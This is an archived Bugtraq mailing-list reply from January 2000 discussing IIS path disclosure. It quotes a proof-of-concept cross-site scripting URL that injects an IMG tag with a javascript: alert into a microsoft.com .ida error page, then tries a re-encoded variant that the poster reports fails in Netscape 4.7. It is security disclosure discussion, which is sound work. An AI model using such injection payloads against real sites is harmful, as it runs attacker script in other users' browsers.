Bugtraq mailing list archives

Re: IIS still revealing paths for web directories

From: scott () AXE NET AU (Scott Buchanan)
Date: Fri, 14 Jan 2000 10:13:19 +1100


Georgi Guninski wrote:


For Communicator:
http://www.microsoft.com/%3CIMG%20SRC=javascript:alert("window.location:"+window.location)%3E.ida


This link comes out as:

http://www.microsoft.com/%3CIMG%20SRC=javascript:alert(

presumably because the quotes need to be % encoded as well.

http://www.microsoft.com/%3CIMG%20SRC=javascript:alert(%34window.location:%34%43window.location)%3E.ida

This link, while it seems to work in as far as you can go to the
correct link, the Javascript doesn't get executed on this copy of
Netscape 4.7

-Scott Buchanan
Axe Communications

Current thread:

Re: Microsoft Security Bulletin (MS00-005), (continued)
- - - Re: Microsoft Security Bulletin (MS00-005) bugtraq () NS DOOMSDAY COM (Jan 19)
    - Re: Microsoft Security Bulletin (MS00-005) Matt Davis (Jan 19)
    - Re: Microsoft Security Bulletin (MS00-005) Tabor J. Wells (Jan 19)
    - Unixware ppptalk what's your style? (Jan 19)
    - Re: Unixware ppptalk Andrew Malcolm (Jan 21)
    - Re: IIS still revealing paths for web directories Henrik Nordstrom (Jan 15)
    - Re: IIS still revealing paths for web directories Antonio Ropero (Jan 15)
    - Re: IIS still revealing paths for web directories Chris Tobkin (Jan 18)
    - SRS Addendum Matt Conover (Jan 12)
    - Re: IIS still revealing paths for web directories Georgi Guninski (Jan 13)
    - Re: IIS still revealing paths for web directories Scott Buchanan (Jan 13)
    - Re: IIS still revealing paths for web directories Taneli Huuskonen (Jan 15)
    - Fwd: Crash identified in Notes, Domino, and MTA with Date Conversio ns Xander Teunissen (Jan 14)
    - Re: IIS still revealing paths for web directories Norbert Luckhardt (Jan 15)
    - usual iploggers miss some variable stealth scans vecna (Jan 17)
    - Re: usual iploggers miss some variable stealth scans Simple Nomad (Jan 17)
    - AW: usual iploggers miss some variable stealth scans Tobi (Jan 18)
    - AW: usual iploggers miss some variable stealth scans Tobi (Jan 19)
    - Warning: VCasel security hole. bob mare (Jan 18)
    - Re: usual iploggers miss some variable stealth scans Alec Kosky (Jan 18)
    - Re: usual iploggers miss some variable stealth scans Andrea Gho (Jan 20)

(Thread continues...)